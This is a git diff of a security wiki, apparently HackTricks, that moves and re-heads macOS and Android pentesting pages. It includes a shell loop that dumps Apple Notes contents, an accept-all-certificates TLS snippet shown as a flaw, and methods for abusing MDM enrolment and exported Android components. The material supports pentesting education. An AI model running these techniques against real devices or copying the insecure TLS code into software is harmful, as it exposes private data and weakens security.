@@ -1036,7 +1034,7 @@ sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tabl
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
```
-# File Extensions Apps
+## File Extensions Apps
The following line can be useful to find the applications that can open files depending on the extension:
@@ -1087,7 +1085,7 @@ grep -A3 CFBundleTypeExtensions Info.plist | grep string
svg
```
-# Apple Scripts
+## Apple Scripts
It's a scripting language used for task automation **interacting with remote processes**. It makes pretty easy to **ask other processes to perform some actions**. **Malware** may abuse these features to abuse functions exported by other processes.\
For example, a malware could **inject arbitrary JS code in browser opened pages**. Or **auto click** some allow permissions requested to the user;
@@ -1116,7 +1114,7 @@ and tin this case the content cannot be decompiled even with `osadecompile`
However, there are still some tools that can be used to understand this kind of executables, [**read this research for more info**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). The tool [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) with [**aevt\_decompile**](https://github.com/SentineLabs/aevt\_decompile) will be very useful to understand how the script works.
-# MacOS Red Teaming
+## MacOS Red Teaming
Red Teaming in **environments where MacOS** is used instead of Windows can be very **different**. In this guide you will find some interesting tricks for this kind of assessments:
@@ -1124,13 +1122,13 @@ Red Teaming in **environments where MacOS** is used instead of Windows can be ve
[macos-red-teaming.md](macos-red-teaming.md)
{% endcontent-ref %}
-# MacOS Automatic Enumeration Tools
+## MacOS Automatic Enumeration Tools
* **MacPEAS**: [https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
* **Metasploit**: [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum\_osx.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum\_osx.rb)
* **SwiftBelt**: [https://github.com/cedowens/SwiftBelt](https://github.com/cedowens/SwiftBelt)
-# Specific MacOS Commands
+## Specific MacOS Commands
```bash
#System info
@@ -1237,17 +1235,15 @@ sudo apachectl (start|status|restart|stop)
#Remove DNS cache
dscacheutil -flushcache
sudo killall -HUP mDNSResponder
-
```
-# References
+## References
* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
* [**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet)
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
-
-
-
diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md
similarity index 98%
rename from macos/macos-security-and-privilege-escalation/mac-os-architecture.md
rename to macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md
index 1d8e4221..ceb2d338 100644
--- a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md
@@ -1,5 +1,7 @@
# Mac OS Architecture
+## Mac OS Architecture
+
+## Kernel
-# Kernel
-
-## XNU
+### XNU
The heart of Mac OS X is the **XNU kernel**. XNU is basically composed of a **Mach core** (covered in the next section) with supplementary features provided by Berkeley Software Distribution (**BSD**). Additionally, **XNU** is responsible for providing an **environment for kernel drivers called the I/O Kit**. **XNU is a Darwin package**, so all of the source **code** is **freely available**.
From a security researcher’s perspective, **Mac OS X feels just like a FreeBSD box with a pretty windowing system** and a large number of custom applications. For the most part, applications written for BSD will compile and run without modification on Mac OS X. All the tools you are accustomed to using in BSD are available in Mac OS X. Nevertheless, the fact that the **XNU kernel contains all the Mach code** means that some day, when you have to dig deeper, you’ll find many differences that may cause you problems and some you may be able to leverage for your own purposes.
-## Mach
+### Mach
Mach was originated as a UNIX-compatible **operating system** back in 1984. One of its primary design **goals** was to be a **microkernel**; that is, to **minimize** the amount of code running in the **kernel** and allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level** Mach tasks.
**In XNU, Mach is responsible for many of the low-level operations** you expect from a kernel, such as processor scheduling and multitasking and virtual- memory management.
-## BSD
+### BSD
The **kernel** also involves a large chunk of **code derived from the FreeBSD** code base. This code runs as part of the kernel along with Mach and uses the same address space. The F**reeBSD code within XNU may differ significantly from the original FreeBSD code**, as changes had to be made for it to coexist with Mach. FreeBSD provides many of the remaining operations the kernel needs, including:
@@ -44,7 +45,7 @@ The **kernel** also involves a large chunk of **code derived from the FreeBSD**
To get an idea of just how complicated the interaction between these two sets of code can be, consider the idea of the fundamental executing unit. **In BSD the fundamental unit is the process. In Mach it is a Mach thread**. The disparity is settled by each BSD-style process being associated with a Mach task consisting of exactly one Mach thread. When the BSD fork() system call is made, the BSD code in the kernel uses Mach calls to create a task and thread structure. Also, it is important to note that both the Mach and BSD layers have different security models. The **Mach security** model is **based** **on** **port** **rights**, and the **BSD** model is based on **process** **ownership**. Disparities between these two models have resulted in a **number of local privilege-escalation vulnerabilities**. Additionally, besides typical system cells, there are Mach traps that allow user-space programs to communicate with the kernel.
-## I/O Kit - Drivers
+### I/O Kit - Drivers
I/O Kit is the open-source, object-oriented, **device-driver framework** in the XNU kernel and is responsible for the addition and management of **dynamically loaded device drivers**. These drivers allow for modular code to be added to the kernel dynamically for use with different hardware, for example. They are located in:
@@ -87,13 +88,13 @@ kextload com.apple.iokit.IOReportFamily
kextunload com.apple.iokit.IOReportFamily
```
-# Applications
+## Applications
A kernel without applications isn’t very useful. **Darwin** is the non-Aqua, **open-source core of Mac OS X**. Basically it is all the parts of Mac OS X for which the **source code is available**. The code is made available in the form of a **package that is easy to install**. There are hundreds of **available Darwin packages**, such as X11, GCC, and other GNU tools. Darwin provides many of the applications you may already use in BSD or Linux for Mac OS X. Apple has spent significant time **integrating these packages into their operating system** so that everything behaves nicely and has a consistent look and feel when possible.
On the **other** hand, many familiar pieces of Mac OS X are **not open source**. The main missing piece to someone running just the Darwin code will be **Aqua**, the **Mac OS X windowing and graphical-interface environment**. Additionally, most of the common **high-level applications**, such as Safari, Mail, QuickTime, iChat, etc., are not open source (although some of their components are open source). Interestingly, these closed-source applications often **rely on open- source software**, for example, Safari relies on the WebKit project for HTML and JavaScript rendering. **For perhaps this reason, you also typically have many more symbols in these applications when debugging than you would in a Windows environment.**
-## **Universal binaries**
+### **Universal binaries**
Mac OS binaries usually are compiled as universal binaries. A **universal binary** can **support multiple architectures in the same file**.
@@ -112,7 +113,7 @@ gcc -arch ppc -arch i386 -o test-universal test.c
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
-## Mach-o Format
+### Mach-o Format
.png>)
@@ -138,8 +139,6 @@ Filetypes:
* MH\_DYLIB (0x6): A Mach-O dynamic linked library (i.e. .dylib)
* MH\_BUNDLE (0x8): A Mach-O bundle (i.e. .bundle)
-
-
**Load commands**
This specifies the **layout of the file in memory**. It contains the **location of the symbol table**, the main thread context at the beginning of execution, and which **shared libraries** are required.\
@@ -204,13 +203,11 @@ A Mach-O binary can contain one or **more** **constructors**, that will be **exe
The offsets of any constructors are held in the **\_\_mod\_init\_func** section of the **\_\_DATA\_CONST** segment.
{% endhint %}
-
-
**Data**
The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.
- (3).png>)
+.png>)
**Get the info**
@@ -223,7 +220,7 @@ otool -L /bin/ls #Get libraries used by the binary
Or you can use the GUI tool [**machoview**](https://sourceforge.net/projects/machoview/).
-## Bundles
+### Bundles
Basically, a bundle is a **directory structure** within the file system. Interestingly, by default this directory **looks like a single object in Finder**. The types of resources contained within a bundle may consist of applications, libraries, images, documentation, header files, etc. All these files are inside `.app/Contents/`
@@ -257,7 +254,7 @@ ls -lR /Applications/Safari.app/Contents
Contains the **oldest** **version** of **macOS** that the application is compatible with.
-## Objective-C
+### Objective-C
Programs written in Objective-C **retain** their class declarations **when** **compiled** into (Mach-O) binaries. Such class declarations **include** the name and type of:
@@ -273,7 +270,7 @@ class-dump Kindle.app
Note that this names can be obfuscated to make the reversing of the binary more difficult.
-## Native Packages
+### Native Packages
There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are:
@@ -284,7 +281,7 @@ There are some projects that allow to generate a binary executable by MacOS cont
* **Electron:** JavaScript, HTML, and CSS.
* These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\\
-# References
+## References
* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
diff --git a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
similarity index 100%
rename from macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
rename to macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md
similarity index 95%
rename from macos/macos-security-and-privilege-escalation/macos-mdm/README.md
rename to macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md
index 01c11514..1812084a 100644
--- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md
@@ -1,5 +1,7 @@
# MacOS MDM
+## MacOS MDM
+
+## Basics
-# Basics
-
-## What is MDM (Mobile Device Management)?
+### What is MDM (Mobile Device Management)?
[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf).
@@ -27,7 +28,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Requires an **MDM server** which implements support for the MDM protocol
* MDM server can **send MDM commands**, such as remote wipe or “install this config”
-## Basics What is DEP (Device Enrolment Program)?
+### Basics What is DEP (Device Enrolment Program)?
The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**.
@@ -41,21 +42,21 @@ Administrators can leverage DEP to automatically enroll devices in their organiz
Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device.
{% endhint %}
-## Basics What is SCEP (Simple Certificate Enrolment Protocol)?
+### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
* A relatively old protocol, created before TLS and HTTPS were widespread.
* Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate.
-## What are Configuration Profiles (aka mobileconfigs)?
+### What are Configuration Profiles (aka mobileconfigs)?
* Apple’s official way of **setting/enforcing system configuration.**
* File format that can contain multiple payloads.
* Based on property lists (the XML kind).
* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018.
-# Protocols
+## Protocols
-## MDM
+### MDM
* Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers)
* **Communication** occurs between a **device** and a server associated with a **device** **management** **product**
@@ -63,7 +64,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* All over **HTTPS**. MDM servers can be (and are usually) pinned.
* Apple grants the MDM vendor an **APNs certificate** for authentication
-## DEP
+### DEP
* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented):
* The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices.
@@ -82,7 +83,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* Additional trusted certificates for server URL (optional pinning)
* Extra settings (e.g. which screens to skip in Setup Assistant)
-# Steps for enrolment and management
+## Steps for enrolment and management
1. Device record creation (Reseller, Apple): The record for the new device is created
2. Device record assignment (Customer): The device is assigned to a MDM server
@@ -96,7 +97,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process.
-## Step 4: DEP check-in - Getting the Activation Record
+### Step 4: DEP check-in - Getting the Activation Record
This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe)
@@ -125,14 +126,14 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
3. All requests over HTTPs, built-in root certificates are used
-.png>)
+ (1).png>)
The response is a JSON dictionary with some important data like:
* **url**: URL of the MDM vendor host for the activation profile
* **anchor-certs**: Array of DER certificates used as trusted anchors
-## **Step 5: Profile Retrieval**
+### **Step 5: Profile Retrieval**
.png>)
@@ -145,9 +146,9 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
- (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+ (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>)
-## Step 6: Profile Installation
+### Step 6: Profile Installation
* Once retrieved, **profile is stored on the system**
* This step begins automatically (if in **setup assistant**)
@@ -182,7 +183,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
* Property: IdentityCertificateUUID
* Delivered via SCEP payload
-## **Step 7: Listening for MDM commands**
+### **Step 7: Listening for MDM commands**
* After MDM check-in is complete, vendor can **issue push notifications using APNs**
* Upon receipt, handled by **`mdmclient`**
@@ -191,9 +192,9 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
* **`ServerURLPinningCertificateUUIDs`** for pinning request
* **`IdentityCertificateUUID`** for TLS client certificate
-# Attacks
+## Attacks
-## Enrolling Devices in Other Organisations
+### Enrolling Devices in Other Organisations
As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected:
@@ -202,7 +203,7 @@ Therefore, this could be a dangerous entrypoint for attackers if the enrolment p
[enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md)
{% endcontent-ref %}
-# **References**
+## **References**
* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU)
* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
similarity index 100%
rename from macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
rename to macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
diff --git a/macos/macos-security-and-privilege-escalation/macos-protocols.md b/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
similarity index 93%
rename from macos/macos-security-and-privilege-escalation/macos-protocols.md
rename to macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
index 27655acf..7c60ac41 100644
--- a/macos/macos-security-and-privilege-escalation/macos-protocols.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
@@ -1,4 +1,4 @@
-
+# MacOS Protocols
-
-
diff --git a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md
similarity index 88%
rename from macos/macos-security-and-privilege-escalation/macos-red-teaming.md
rename to macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md
index 73f1d8ae..f348a15c 100644
--- a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md
@@ -1,4 +1,4 @@
-
+# MacOS Red Teaming
-
-
diff --git a/macos/macos-security-and-privilege-escalation/macos-serial-number.md b/macos-hardening/macos-security-and-privilege-escalation/macos-serial-number.md
similarity index 100%
rename from macos/macos-security-and-privilege-escalation/macos-serial-number.md
rename to macos-hardening/macos-security-and-privilege-escalation/macos-serial-number.md
diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
similarity index 95%
rename from mobile-apps-pentesting/android-app-pentesting/README.md
rename to mobile-pentesting/android-app-pentesting/README.md
index 7efa16be..bf8eb4bd 100644
--- a/mobile-apps-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -1,5 +1,7 @@
# Android Applications Pentesting
+## Android Applications Pentesting
+
-
-# Android Applications Basics
+## Android Applications Basics
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
@@ -25,19 +26,19 @@ It's highly recommended to start reading this page to know about the **most impo
[android-applications-basics.md](android-applications-basics.md)
{% endcontent-ref %}
-# ADB (Android Debug Bridge)
+## ADB (Android Debug Bridge)
This is the main tool you need to connect to an android device (emulated or physical).\
It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more.
Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb.
-# Smali
+## Smali
Sometimes it is interesting to **modify the application code** to access **hidden information** (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). This could be very useful as an **alternative for several tests during the dynamic analysis** that are going to presented. Then, **keep always in mid this possibility**.
-# Other interesting tricks
+## Other interesting tricks
* [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
* **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/)
@@ -53,20 +54,20 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
```
-# Static Analysis
+## Static Analysis
First of all, for analysing an APK you should **take a look to the to the Java code** using a decompiler.\
Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
-## Looking for interesting Info
+### Looking for interesting Info
Just taking a look to the **strings** of the APK you can search for **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** and anything interesting... look even for code execution **backdoors** or authentication backdoors (hardcoded admin credentials to the app).
**Firebase**
-Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../pentesting/pentesting-web/buckets/firebase-database.md)
+Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
-## Basic understanding of the application - Manifest.xml, strings.xml
+### Basic understanding of the application - Manifest.xml, strings.xml
Using any of the **decompilers** mentioned [**here** ](apk-decompilers.md)you will be able to read the _Manifest.xml_. You could also **rename** the **apk** file extension **to .zip** and **unzip** it.\
Reading the **manifest** you can find **vulnerabilities**:
@@ -91,7 +92,7 @@ Reading **resources.arsc/strings.xml** you can find some **interesting info**:
* Custom schemas
* Other interesting info developers save in this file
-## Tapjacking
+### Tapjacking
**Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app.\
In effect, it is **blinding the user from knowing they are actually performing actions on the victim app**.
@@ -117,13 +118,13 @@ The mitigation is relatively simple as the developer may choose not to receive t
>
> To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window.
-## Task Hijacking
+### Task Hijacking
{% content-ref url="android-task-hijacking.md" %}
[android-task-hijacking.md](android-task-hijacking.md)
{% endcontent-ref %}
-## Insecure data storage
+### Insecure data storage
**Internal Storage**
@@ -148,7 +149,7 @@ Starting with Android 4.4 (**API 17**), the SD card has a directory structure wh
* **Shared preferences**: Android allow to each application to easily save xml files in the path `/data/data//shared_prefs/` and sometimes it's possible to find sensitive information in clear-text in that folder.
* **Databases**: Android allow to each application to easily save sqlite databases in the path `/data/data//databases/` and sometimes it's possible to find sensitive information in clear-text in that folder.
-## Broken TLS
+### Broken TLS
**Accept All Certificates**
@@ -161,7 +162,7 @@ sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
-## Broken Cryptography
+### Broken Cryptography
**Poor Key Management Processes**
@@ -171,7 +172,7 @@ Some developers save sensitive data in the local storage and encrypt it with a k
Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt.
-## Other checks
+### Other checks
* It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
* If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
@@ -179,7 +180,7 @@ Developers shouldn't use **deprecated algorithms** to perform authorisation **ch
* If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified.
* Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK
-## React Native Application
+### React Native Application
Read the following page to learn how to easily access javascript code of React applications:
@@ -187,7 +188,7 @@ Read the following page to learn how to easily access javascript code of React a
[react-native-application.md](react-native-application.md)
{% endcontent-ref %}
-## Xamarin Applications
+### Xamarin Applications
**Xamarin** apps are written in **C#**, in order to access the C# code **decompressed,** you need to get the files from the **apk**:
@@ -203,30 +204,30 @@ python3 xamarin-decompress.py -o /path/to/decompressed/apk
and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
-## Automated Static Code Analysis
+### Automated Static Code Analysis
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
-## Other interesting functions
+### Other interesting functions
* **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
* **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
* **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
* [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
-## **Other tricks**
+### **Other tricks**
{% content-ref url="content-protocol.md" %}
[content-protocol.md](content-protocol.md)
{% endcontent-ref %}
-# Dynamic Analysis
+## Dynamic Analysis
> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended.
-## Online Dynamic analysis
+### Online Dynamic analysis
You can create a **free account** in: [https://appetize.io/](https://appetize.io). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
@@ -236,7 +237,7 @@ You can even **see the logs of your application** in the web and connect through
Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
-## Local Dynamic Analysis
+### Local Dynamic Analysis
You can use some **emulator** like:
@@ -267,7 +268,7 @@ Or you could use a **physical** **device** (you need to activate the debugging o
> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so will will be able to **learn how the application works** while MobSF **capture** a lot of **interesting** **data** you can review later on.
-## Unintended Data Leakage
+### Unintended Data Leakage
**Logging**
@@ -292,7 +293,7 @@ As pentester, **try to take a look to these logs**.
Most of the application uses other services in their application like Google Adsense but sometimes they **leak some sensitive data** or the data which is not required to sent to that service. This may happen because of the developer not implementing feature properly. You can **look by intercepting the traffic** of the application and see whether any sensitive data is sent to 3rd parties or not.
-## SQLite DBs
+### SQLite DBs
Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** (which would be a vulnerability).\
Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
@@ -301,12 +302,12 @@ If the database is saving confidential information and is **encrypted b**ut you
Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema `
-## Drozer (Exploit Activities, Content Providers and Services)
+### Drozer (Exploit Activities, Content Providers and Services)
**Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Android’s Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. From [Drozer Guide](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf).\
Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
-## Exploiting exported Activities
+### Exploiting exported Activities
[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method.
@@ -335,13 +336,13 @@ Note that an authorisation bypass is not always a vulnerability, it would depend
**Activities can also return results**. If you manage to find an exported and unprotected activity calling the **`setResult`** method and **returning sensitive information**, there is a sensitive information leakage.
-## Exploiting Content Providers - Accessing and manipulating sensitive information
+### Exploiting Content Providers - Accessing and manipulating sensitive information
[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable.\
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)
-## **Exploiting Services**
+### **Exploiting Services**
[**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\
\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`.
@@ -349,7 +350,7 @@ Content providers are basically used to **share data**. If an app has available
As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)
-## **Exploiting Broadcast Receivers**
+### **Exploiting Broadcast Receivers**
[**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
@@ -357,7 +358,7 @@ As service is basically something that **can receive data**, **process** it and
A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers)
-## **Exploiting Schemes / Deep links**
+### **Exploiting Schemes / Deep links**
You can look for deep links manually, using tools like MobSF or scripts like [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
You can **open** a declared **scheme** using **adb** or a **browser**:
@@ -379,7 +380,7 @@ _Note that you can **omit the package name** and the mobile will automatically c
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
- (1) (1).png>)
+ (1) (1) (1).png>)
**Sensitive info**
